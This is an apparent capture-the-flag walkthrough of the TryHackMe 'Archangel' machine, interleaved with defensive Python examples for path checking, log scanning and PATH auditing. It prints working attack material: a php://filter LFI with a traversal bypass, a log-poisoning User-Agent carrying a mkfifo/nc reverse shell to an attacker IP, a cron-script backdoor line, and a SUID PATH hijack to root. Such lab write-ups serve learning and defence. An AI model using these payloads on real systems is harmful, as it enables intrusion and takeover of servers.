Disclaimer

The hosts attacked in this article are legally authorized targets. The tools and methods described here are for learning and exchange only. Do not use the tools or the attack ideas from this article for any illegal purpose. I am not responsible for any consequences arising from it, nor for any misuse or damage caused.

Service discovery

```
┌──(root💀kali)-[~/tryhackme/Archangel]
└─# nmap -sV -Pn 10.10.228.134
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 05:43 EDT
Nmap scan report for 10.10.228.134
Host is up (0.32s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.39 seconds
```

Port 80

Directory brute-forcing

```
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e * -t 100 -u http://10.10.228.134

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.228.134/_21-10-29_06-02-36.txt
Error Log: /root/dirsearch/logs/errors-21-10-29_06-02-36.log

Target: http://10.10.228.134/

[06:02:37] Starting:
[06:03:59] 301 -  312B - /flags  ->  http://10.10.228.134/flags/
[06:04:06] 301 -  313B - /images  ->  http://10.10.228.134/images/
[06:04:06] 200 -    0B - /images/
[06:04:08] 200 -   19KB - /index.html
[06:04:29] 301 -  312B - /pages  ->  http://10.10.228.134/pages/
[06:04:30] 200 -    0B - /pages/
[06:04:44] 403 -  277B - /server-status
```

/flags redirects to a YouTube video and contains nothing else, so it should be a rabbit hole; the other folders give no further information either.

A domain name, mafialive.thm, is discovered, so add it to the hosts file:

```
echo "10.10.228.134 mafialive.thm" >> /etc/hosts
```

Open mafialive.thm to find flag 1.

Brute-force directories again

```
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e * -t 100 -u http://mafialive.thm

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/mafialive.thm/_21-11-01_06-52-00.txt
Error Log: /root/dirsearch/logs/errors-21-11-01_06-52-00.log

Target: http://mafialive.thm/

[06:52:01] Starting:
[06:53:22] 200 -   59B - /index.html
[06:53:50] 200 -   34B - /robots.txt
[06:54:02] 200 -  286B - /test.php
```

Open test.php and click the button on the page. The URL now contains a file path; changing the file name in that path lets us read the contents of other files on the server, which indicates an LFI vulnerability.

We use the PHP filter wrapper (php://filter) to dump the complete page source. The payload is as follows:

```
/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php
```

Base64-decode the output to get the source code of test.php, which contains flag 2.

Source code review

```php
<?php
function containsStr($str, $substr) {
    return strpos($str, $substr) !== false;
}

if (isset($_GET["view"])) {
    // Blocklist check: '../..' must not appear, and the expected directory string must appear.
    if (!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
        include $_GET['view'];
    } else {
        echo 'Sorry, Thats not allowed';
    }
}
?>
```

The include only runs when both conditions hold: the string `../..` must not appear in the parameter, and the string `/var/www/html/development_testing` must appear in it.

We can bypass this by writing `..//..` instead of `../..`: the extra slash breaks the blocklisted substring, but the path still resolves upward. The payload to read /etc/passwd is as follows:

```
/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//etc/passwd
```
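To make the weakness in the two string checks concrete, the following added example (my own code, not the room's PHP) re-implements the page's `containsStr` logic in Python beside a hardened check that normalises the path and requires it to stay under the allowed directory. The base directory is the one from the page; the helper names are mine.

```python
import posixpath

# The directory test.php is supposed to serve files from (taken from the page).
BASE = "/var/www/html/development_testing"


def contains_str(haystack, needle):
    """Python equivalent of the page's containsStr(): strpos($str, $substr) !== false."""
    return haystack.find(needle) != -1


def weak_check(view):
    """The page's original logic: blocklist '../..' and require the base directory string.

    Both checks are substring tests, so '..//..' (not the blocklisted text, yet still
    traversal) and stream wrappers such as php://filter pass as long as BASE appears."""
    return (not contains_str(view, "../..")) and contains_str(view, BASE)


def resolve_view(view):
    """Hardened replacement (my suggestion, not from the page).

    Rejects anything with a scheme (php://, data://, ...), requires an absolute path,
    normalises it (collapses '..', '.', and repeated slashes) and only then verifies
    that the result is inside BASE. Returns the normalised path, or None if rejected."""
    if "://" in view or not view.startswith("/"):
        return None
    normalized = posixpath.normpath(view)
    if normalized == BASE or normalized.startswith(BASE + "/"):
        return normalized
    return None


def hardened_check(view):
    return resolve_view(view) is not None


if __name__ == "__main__":
    # Constructed inputs: the page's bypass payload and a legitimate file.
    for sample in (
        BASE + "/test.php",
        BASE + "/../../etc/passwd",
        BASE + "/..//..//..//..//etc/passwd",
        "php://filter/convert.base64-encode/resource=" + BASE + "/test.php",
    ):
        print(f"{sample!r}: weak={weak_check(sample)} hardened={hardened_check(sample)}")
```

In a real application an allow-list of file names is still preferable to any path check, because `include` also follows symlinks that `normpath` cannot see.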

Base64-decode the output to get the user names:

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
archangel:x:1001:1001:Archangel,,,:/home/archangel:/bin/bash
```

We tried brute-forcing archangel's SSH password, but nothing came out of it.

After some testing, the Apache access log can be read through the same LFI:

```
/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log
```

Analysis

Apache 2.4-2.9 has a file parsing vulnerability. Combined with the LFI, we can write a payload into the log and then include the log file through the web page, which triggers a reverse shell.

First, a normal log entry looks like this:

```
[02/Nov/2021:14:14:38 +0530] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//etc/passwd HTTP/1.1" 200 1277 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
```

Apache records the requested URL path and the User-Agent header.

So we can put PHP code into the User-Agent. The resulting log entry would look like this:

```
[02/Nov/2021:14:14:38 +0530] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//etc/passwd HTTP/1.1" 200 1277 "-" "<?php phpinfo(); ?>"
```

Then open the log file in the browser through the LFI.

If the page now shows the PHP version information, our PHP code is being executed.
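From the defender's side, the two log entries above are exactly what a log monitor should alert on. The following added example (my own code, not part of the write-up) parses Apache combined-format lines and flags stream wrappers and traversal in the request, references to log files, and PHP tags in the User-Agent or Referer. The sample entries are constructed after the ones quoted above; the client IPs and byte counts in them are made up.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: client ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)

# PHP stream wrappers that should never appear in a file-name parameter.
STREAM_WRAPPERS = ("php://", "data://", "expect://", "phar://", "zip://")
PHP_TAGS = ("<?php", "<?=")


def parse_line(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    match = LOG_RE.match(line.rstrip("\n"))
    return match.groupdict() if match else None


def indicators(entry):
    """List the LFI / log-poisoning indicators present in one parsed entry."""
    found = []
    request = unquote(entry["request"])      # decode %2e%2e%2f style encoding first
    lowered = request.lower()
    if any(wrapper in lowered for wrapper in STREAM_WRAPPERS):
        found.append("stream-wrapper-in-request")
    # '../' also matches the '..//' variant used above to slip past a '../..' blocklist.
    if "../" in request or "..\\" in request:
        found.append("path-traversal-in-request")
    if "/var/log/" in lowered:
        found.append("log-file-referenced-in-request")
    for field in ("agent", "referer"):
        if any(tag in entry[field].lower() for tag in PHP_TAGS):
            found.append("php-tag-in-" + field)
    return found


def scan_log(lines):
    """Return (line_number, client, indicators) for every entry that trips at least one rule."""
    hits = []
    for number, line in enumerate(lines, start=1):
        entry = parse_line(line)
        if entry is None:
            continue
        flags = indicators(entry)
        if flags:
            hits.append((number, entry["client"], flags))
    return hits


# Constructed sample log: one benign request, the php://filter read, and a poisoned User-Agent.
SAMPLE_LOG = [
    '10.13.21.169 - - [02/Nov/2021:14:14:38 +0530] "GET /index.html HTTP/1.1" 200 59 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"',
    '10.13.21.169 - - [02/Nov/2021:14:14:39 +0530] "GET /test.php?view=php://filter/convert.base64-encode/'
    'resource=/var/www/html/development_testing/..//..//..//..//etc/passwd HTTP/1.1" 200 1277 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"',
    '10.13.21.169 - - [02/Nov/2021:14:14:40 +0530] "GET /test.php?view=/var/www/html/development_testing/'
    '..//..//..//..//var/log/apache2/access.log HTTP/1.1" 200 4096 "-" "<?php phpinfo(); ?>"',
]

if __name__ == "__main__":
    for number, client, flags in scan_log(SAMPLE_LOG):
        print(f"line {number} from {client}: {', '.join(flags)}")
```

Note that the status code is deliberately ignored: the poisoning request itself can return 200 and look harmless, and the actual execution happens later when the log is included, so the User-Agent rule is what catches it early.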

Attack

The payload is as follows:

```
GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log HTTP/1.1
Host: mafialive.thm
User-Agent: "<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4444 >/tmp/f')?>"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

Start a listener

```
nc -lnvp 4444
```

Trigger

```
http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log
```

The reverse shell is received:

```
┌──(root💀kali)-[~/tryhackme/Archangel]
└─# nc -lnvp 4455
listening on [any] 4455 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.228.134] 54296
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ ls
index.html
mrrobot.php
robots.txt
test.php
$ cd /home
$ ls
archangel
$ cd archangel
$ ls
myfiles
secret
user.txt
```

In the same folder as user.txt, the secret file is not readable by us, and the myfiles folder contains a password file, which once again just points to the YouTube "Don't Give Up" video (i.e. the author is laughing at us).

Privilege escalation to archangel

LinPEAS finds a scheduled task that runs as archangel, and the script it executes is world-writable:

```
www-data@ubuntu:/var/www/html/development_testing$ cat /opt/helloworld.sh
#!/bin/bash
echo "hello world" >> /opt/backupfiles/helloworld.txt
www-data@ubuntu:/var/www/html/development_testing$ ls -alh /opt/helloworld.sh
-rwxrwxrwx 1 archangel archangel 66 Nov 20  2020 /opt/helloworld.sh
```

Append a reverse shell to the scheduled task's script:

```
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4242 >/tmp/f" >> /opt/helloworld.sh
```

The reverse shell is received:

```
┌──(root💀kali)-[~/tryhackme/Archangel]
└─# nc -lnvp 462
listening on [any] 462 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.228.134] 37592
/bin/sh: 0: can't access tty; job control turned off
$ whoami
archangel
$ id
uid=1001(archangel) gid=1001(archangel) groups=1001(archangel)
$
```

Get the second user flag from /home/archangel/secret.

Privilege escalation to root

In the same folder there is a backup binary with the SUID bit set. Download it to the attacking machine and run strings on it; among the symbols there is a fragment of shell command:

```
┌──(root💀kali)-[~/tryhackme/Archangel]
└─# strings backup
/lib64/ld-linux-x86-64.so.2
setuid
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
cp /home/user/archangel/myfiles/* /opt/backupfiles
```

Analysis

Look at the line of shell command at the end of the output:

```
cp /home/user/archangel/myfiles/* /opt/backupfiles
```

The command copies everything under /home/user/archangel/myfiles/ to /opt/backupfiles using cp.

A SUID binary runs with the privileges of its owner (here root) even when an ordinary user executes it. The cp inside this binary is therefore invoked by an ordinary user but runs as root. Note that it is called as a bare command name, not an absolute path: if we can make the shell find a different cp first, we control what runs as root.

On Linux, the directories searched for commands are listed in the user's $PATH environment variable. When a command is typed at the terminal (or, as here, passed to system() without a path), the shell walks the directories in $PATH in order and runs the first matching binary it finds. If no directory contains it, "command not found" is returned.
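The lookup order described above is the whole weakness: a privileged program that calls `cp` by name inherits whatever $PATH its caller set. The following added example (my own code, not the room's binary) models the shell's left-to-right search in a throwaway directory layout, and pairs it with an `audit_path` helper that flags the entries a privileged program must not trust. The directory names and the fake `cp` scripts are constructed for the demo; `DEFAULT_PATH` is the value quoted later in the write-up.

```python
import os
import stat
import tempfile

# The archangel user's unmodified PATH, as shown in the write-up.
DEFAULT_PATH = "/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin"


def resolve_command(name, path_env):
    """Return the first executable called `name` found in the PATH string,
    searching directories left to right exactly as the shell does."""
    for directory in path_env.split(os.pathsep):
        if directory == "":
            directory = "."          # an empty PATH entry means "the current directory"
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def audit_path(path_env):
    """Flag PATH entries a SUID/root program must not trust: empty or relative
    entries, and directories whose mode bits let group or others write to them."""
    findings = []
    for directory in path_env.split(os.pathsep):
        if directory == "" or not os.path.isabs(directory):
            findings.append((directory, "relative or empty entry"))
            continue
        try:
            mode = os.stat(directory).st_mode
        except FileNotFoundError:
            continue                 # a missing directory cannot be abused, skip it
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((directory, "group/world-writable directory"))
    return findings


def _make_fake_binary(directory, name):
    """Create a harmless stand-in executable that only prints its own name (constructed)."""
    path = os.path.join(directory, name)
    with open(path, "w") as handle:
        handle.write("#!/bin/sh\necho " + name + "\n")
    os.chmod(path, 0o755)
    return path


def demo():
    """Build a temporary layout with a system 'bin' and a user-writable 'home',
    each holding a 'cp', and show which one each PATH resolves to."""
    with tempfile.TemporaryDirectory() as tmp:
        sysbin = os.path.join(tmp, "bin")
        home = os.path.join(tmp, "home")
        os.mkdir(sysbin)
        os.mkdir(home)
        os.chmod(sysbin, 0o755)      # like /bin: only the owner may write
        os.chmod(home, 0o777)        # like a user's home dir on this box: anyone may write
        real_cp = _make_fake_binary(sysbin, "cp")
        shadow_cp = _make_fake_binary(home, "cp")

        inherited = home + os.pathsep + sysbin   # what `export PATH=/home/archangel:$PATH` yields
        fixed = sysbin                           # a fixed, trusted PATH (or use /bin/cp outright)

        return {
            "inherited_resolves_to_home": resolve_command("cp", inherited) == shadow_cp,
            "fixed_resolves_to_sysbin": resolve_command("cp", fixed) == real_cp,
            "audit_flags_home": any(d == home for d, _ in audit_path(inherited)),
            "audit_clean_for_fixed": audit_path(fixed) == [],
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The fix on the program side is the mirror image of the attack: call `/bin/cp` by absolute path, or reset `PATH` to a fixed trusted value before calling `system()`, and never let a SUID binary inherit the caller's environment.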

Escalating

View the current user's $PATH:

```
echo $PATH
/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
```

Prepend the home directory /home/archangel to $PATH:

```
archangel@ubuntu:~$ export PATH=/home/archangel:$PATH
archangel@ubuntu:~$ echo $PATH
/home/archangel:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
```

Create a file named cp in the newly added directory and make it executable:

```
archangel@ubuntu:~$ touch cp
archangel@ubuntu:~$ chmod +x cp
```

Put the following content into the new cp file:

```
#!/bin/bash
bash -p
```

Check the cp file:

```
archangel@ubuntu:~$ cat cp
#!/bin/bash
bash -p
```

With everything in place, run the SUID binary backup; the shell it spawns runs as root:

```
archangel@ubuntu:~/secret$ ./backup
root@ubuntu:~/secret# id
uid=0(root) gid=0(root) groups=0(root),1001(archangel)
root@ubuntu:~/secret# whoami
root
root@ubuntu:~/secret# cat /root/root.txt
```

Conclusion

A wonderful target machine; I learned a lot of new things. With LFI, there are generally two ways to get a shell:

  1. LFI + file upload

  2. LFI + file parsing vulnerability

This article uses the second one. For the first method, I have a record on another target.

For privilege escalation, the $PATH environment variable is modified. This method needs to be combined with a SUID binary. This article hijacks the cp command, but other commands can be hijacked the same way, such as mv, tar and so on, depending on the specific situation of the target machine.